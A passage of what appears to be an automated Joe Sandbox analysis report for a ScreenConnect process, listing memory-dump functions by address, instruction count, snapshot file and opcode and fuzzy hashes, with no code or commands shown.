                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08114F30A002099FCB05DB68DD819AEBBA9EF88350B108539E519DB355DB70ED05CB94
                                                                                                                                                                                                                                                        Function 00DDED77 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e7b94f34f970f16466c9723bceec7551d8d54e79786d3a68639e3a89f6ef8f47
                                                                                                                                                                                                                                                        • Instruction ID: 08d8e8011bd1c199dfe500a5eba57e7d26a56c1c75a3f4134769079160026614
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7b94f34f970f16466c9723bceec7551d8d54e79786d3a68639e3a89f6ef8f47
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7211732D10B0A99CB10EFB9D8505EEF7B0EF99310F10C72AE599B7111FB70A6958B91
                                                                                                                                                                                                                                                        Function 00C5D683 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c5d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                        • Instruction ID: f99fdb1a613487d2c24c0d888a3a21a92729eb1e904775d16aa0a1dfee58ad5c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C511AF7A504380CFCB16CF10D5C4B16BF61FB98315F24C5A9DD4A0B25AC336D99ADBA2
                                                                                                                                                                                                                                                        Function 00DD484C Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7ce0d31719c463be5633ed31316f13aea82524bc0859edce3377572593ea1d31
                                                                                                                                                                                                                                                        • Instruction ID: 562834530d23d1870ee05b62a544725f1770dffe59174c403a1e63bc9fa0417f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ce0d31719c463be5633ed31316f13aea82524bc0859edce3377572593ea1d31
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6621D3B58006499FCB10DF9AD444AEEFBF4EF48320F14842AD919A7340D7B9A545CFA5
                                                                                                                                                                                                                                                        Function 00DD73F8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: aa64609c19ff3c1cd0b7ca0a7e073af9da2ae99caecfb4676ced65f29e85845c
                                                                                                                                                                                                                                                        • Instruction ID: fd746eaddd144899016e80cd48f1022dec0f4cf5453963c10ac89fe57f944ce6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa64609c19ff3c1cd0b7ca0a7e073af9da2ae99caecfb4676ced65f29e85845c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611A331B045058FC705DB68D49496EBBB2EFC9310B1581AAC509DB3A5EB31DC42C791
                                                                                                                                                                                                                                                        Function 00DD5353 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cf64120dd25acb74c59ffc9e1cbf8e5aebafb0127c2c74cdecf7c7b86fa9f40a
                                                                                                                                                                                                                                                        • Instruction ID: 8da60cc05dc4d06f8470b72870500958700e5797637ee2e06e54c1f1753cbe15
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf64120dd25acb74c59ffc9e1cbf8e5aebafb0127c2c74cdecf7c7b86fa9f40a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B61100B58006098FCB10DF9AD884ADEFBF4FF88320F14842AD919A7350D779A645CFA5
                                                                                                                                                                                                                                                        Function 00DDFA80 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 88efc2a3d50277f7978610453d153267b44f2e0963477bf108b9349ba514657b
                                                                                                                                                                                                                                                        • Instruction ID: a3bca30794c357171b7821c2ca963716a5c72c29e50ae43e39b3e1ae2ad2a651
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88efc2a3d50277f7978610453d153267b44f2e0963477bf108b9349ba514657b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC018F363411108B8708DB6DF89496EB3AAFBD8275358C43BE909C7352CE32EC138768
                                                                                                                                                                                                                                                        Function 00DDECB1 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e2cfb6c023becc45736bddcbe92870f54a7874f2ee13735bea8b1b43ba03ce04
                                                                                                                                                                                                                                                        • Instruction ID: c8e25ea01b07d1f389f26b8ee820434dbfa66967f81fadca1c7ce734edf690bc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2cfb6c023becc45736bddcbe92870f54a7874f2ee13735bea8b1b43ba03ce04
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08116D70E143498FCB15EFB8C4519ADBFB1AF46310F15865BD014EB3A1EB308641CBA1
                                                                                                                                                                                                                                                        Function 00DD91B8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f04f0c5085ee56184d3e0bc62fadf436ef68b76fa6f5cfb1ff092a9a07060278
                                                                                                                                                                                                                                                        • Instruction ID: 42b6d7746a8f81c6b7d24dabfe90c922b2689be5af03431c4f1084e4452006b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f04f0c5085ee56184d3e0bc62fadf436ef68b76fa6f5cfb1ff092a9a07060278
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA11A171E40205AFDB14CA69C810AAFFBF6AFC4300F98C476D554E7254E7729A01CBA4
                                                                                                                                                                                                                                                        Function 00DDCBC0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 694cc0495dc192c17eb82f57a92c249902c32760a6dd8cbc4ae9d4d761f11331
                                                                                                                                                                                                                                                        • Instruction ID: cd5d7c86c8beb7a4a3506d50414fb3e138ed88ddc7b4035fdf3afa5e2b381ccf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 694cc0495dc192c17eb82f57a92c249902c32760a6dd8cbc4ae9d4d761f11331
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18110D31E502198FCF14DBA8D961AEDBBB5AF49310F00146AD106BB374DA741D45CBA0
                                                                                                                                                                                                                                                        Function 00DD8B95 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 021c5da5be357e019191b88f22276cc5c591156742bcfcf64331076789dbecd4
                                                                                                                                                                                                                                                        • Instruction ID: ca5fe2efd65de794c9276e7b25100c79c15e76a40f902ce9f389bfad20027ff1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 021c5da5be357e019191b88f22276cc5c591156742bcfcf64331076789dbecd4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95115B3194014EDFCB06DFA8D9909ECBBB2EF84304B59C556E045AB225DB31ED4AEB70
                                                                                                                                                                                                                                                        Function 00DD91B3 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3a9a506fc4aa19c7d01209f9dbc9709abc8cf9ebe8aa5f121237ebc64da26705
                                                                                                                                                                                                                                                        • Instruction ID: 04ab5bf52fef9b82ef3622bb1433f42319437e1964a25351b5544c916fd1014a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a9a506fc4aa19c7d01209f9dbc9709abc8cf9ebe8aa5f121237ebc64da26705
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1711A171E40204AFDB24CA68D850AEEBBB6AFC4300F58C566D554E7254D7729A02CB94
                                                                                                                                                                                                                                                        Function 00DD7408 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: af05532514f0ec80bb5cf3589f12a7507a5c6c18f9e93d6bab556cfc6d68bc8f
                                                                                                                                                                                                                                                        • Instruction ID: 50352364ff2bcc43c74a0e77e3c94afc40ab994a8e39601044d988b9dda465d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af05532514f0ec80bb5cf3589f12a7507a5c6c18f9e93d6bab556cfc6d68bc8f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D018474B540158FC705DB59D45497EFBB6EFC8310B24816AD90ADB355EB31EC02C7A1
                                                                                                                                                                                                                                                        Function 00DDCBB0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ded4c754472a176c2ab3af9ccfb3291e1c5368fe871417eaf3422b640f21620d
                                                                                                                                                                                                                                                        • Instruction ID: 4703b36e7ea4b2decd179d2c163f251676aacdb0f9732887b2ca421c50761e57
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded4c754472a176c2ab3af9ccfb3291e1c5368fe871417eaf3422b640f21620d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D011A030E142599FDF15EBA8D960AEDBFB1AF4A300F04046AD106BB3A4DB381C04CBA1
                                                                                                                                                                                                                                                        Function 00DD8AB0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e87e8122e8e3436e956e24aab6c0f3d39b3db91f055449ddb9bd26230cb5352e
                                                                                                                                                                                                                                                        • Instruction ID: 019582d36d38a0bf4eebcb4db6fac7e866d0d3857dc85aff2768124e2a35f18e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e87e8122e8e3436e956e24aab6c0f3d39b3db91f055449ddb9bd26230cb5352e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C311303690020A9FCF01DFA8C9409DEBBF5FF49304B10856AE504FB261D772AA0ACB90
                                                                                                                                                                                                                                                        Function 00DD8AAB Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 536481f28b6df669f765fffaaca62e1f545f9b31f323474e66336a66c7a149e1
                                                                                                                                                                                                                                                        • Instruction ID: 3db6d9a709ad73da03f2d4d33deec3ccff0aa5ece752c8888178245d483da142
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 536481f28b6df669f765fffaaca62e1f545f9b31f323474e66336a66c7a149e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB11213590010A9FCB01DFA8D9409DEBBB1FF49354B10856AD904FB261D771AA0ACB90
                                                                                                                                                                                                                                                        Function 00DD4EF8 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9e567c4e78a346c0b209067f96019712c7d759f081086b4747b87269d229354c
                                                                                                                                                                                                                                                        • Instruction ID: 14f50842b9854613d29c95f6827596fbbdfa8627a4adee967a4a60e87897fd3b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e567c4e78a346c0b209067f96019712c7d759f081086b4747b87269d229354c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9017B319083986FC709ABBC98654AD7FE4EE8A300F0408EBC0C5CB352DD38D406C765
                                                                                                                                                                                                                                                        Function 00DDA9C8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 04daff8c09580eb4211e61f91b96d468b95d477b49780cf6425688a3b4a27e68
                                                                                                                                                                                                                                                        • Instruction ID: 99ad0bac9f2c77a0546a13d927d1e3fde10846753e39988d41f2e1315b58c52b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04daff8c09580eb4211e61f91b96d468b95d477b49780cf6425688a3b4a27e68
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B701F271B002155B8B188A6DE80045BBBE9EBC4260314893BE405CB300EEB1DC068BD0
                                                                                                                                                                                                                                                        Function 00C5D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c5d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c4565e76e52a410668ba08723878f0411e5bc05e6cb6b0535bf25643c808428b
                                                                                                                                                                                                                                                        • Instruction ID: abc4c91b3389c9341cceb87e04ce2cec92aac35fe599ea878b32eedcc75b52e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4565e76e52a410668ba08723878f0411e5bc05e6cb6b0535bf25643c808428b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54018C6100E3C09ED7228B258C94B52BFB8EF53225F0980DBDD988F2E3C2694849C772
                                                                                                                                                                                                                                                        Function 00C5D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c5d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9cbef9a0856cc777921e25720db2780fe62fa4f529ae9d53bed08d89c4545f4f
                                                                                                                                                                                                                                                        • Instruction ID: 925214071466d76185bd423a7ab7d9fdab9b3914717fd75b85730f649b954bdd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cbef9a0856cc777921e25720db2780fe62fa4f529ae9d53bed08d89c4545f4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C012B750043409ED7308A16CCC4B67FF9CEFC5322F18C429ED5A4B2C6C679998AC6B9
                                                                                                                                                                                                                                                        Function 00DD8B3B Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 16585fd11031622f016d09b62d8bdbad2c90271e7a5fd8401f5888fc58e674d7
                                                                                                                                                                                                                                                        • Instruction ID: cfec7ee719a40d6609d9ed9571f5d9c3dbbd23c7ec233c21348803538c82156f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16585fd11031622f016d09b62d8bdbad2c90271e7a5fd8401f5888fc58e674d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9015A31D0015DDFCF09DFA9E9548DDBBB2EF88314F05852AE405B7254DB316906CBA4
                                                                                                                                                                                                                                                        Function 00DD6461 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 90e3439bac9f53e37ab3c2316e4d547f22c47f84566837b3438ae9ac0b764d9a
                                                                                                                                                                                                                                                        • Instruction ID: b6cc10073c0300e5d1bbed073fa1abf756b4966b1c373fa19e9e82a3550e11fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90e3439bac9f53e37ab3c2316e4d547f22c47f84566837b3438ae9ac0b764d9a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F0A4313042055FC714CB6CE880D9ABBE9EFC53A0714862AE409CB395D671ED06C790
                                                                                                                                                                                                                                                        Function 00DD8B40 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b1c92253ea94e43957a2f4f47df69339e9b88916517019bbac49f2037000d61b
                                                                                                                                                                                                                                                        • Instruction ID: 8502fba0bb3caa1bf053627a7bf3bb2417b324bd4a3d4262233528c08b9d8752
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c92253ea94e43957a2f4f47df69339e9b88916517019bbac49f2037000d61b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59014B32E0015DDBCF09EFA9D9148CDFBB6EF89314F05842AE505B7264DB316906CBA4
                                                                                                                                                                                                                                                        Function 00DDBCC8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c30ff8e8dc3bb9615d9203d3ab773fcc7a0489d23c16c5a0f06bce992327bed8
                                                                                                                                                                                                                                                        • Instruction ID: 9a2fd89690d47b992d024e8e6aee0771ce7ead0001eb003b41ca0fab3fdd36e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c30ff8e8dc3bb9615d9203d3ab773fcc7a0489d23c16c5a0f06bce992327bed8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6F08C77B0D2189FD728CABEA40069BBBDECBD4228B14C07FE54DC3740E935A8018764
                                                                                                                                                                                                                                                        Function 00DDF640 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
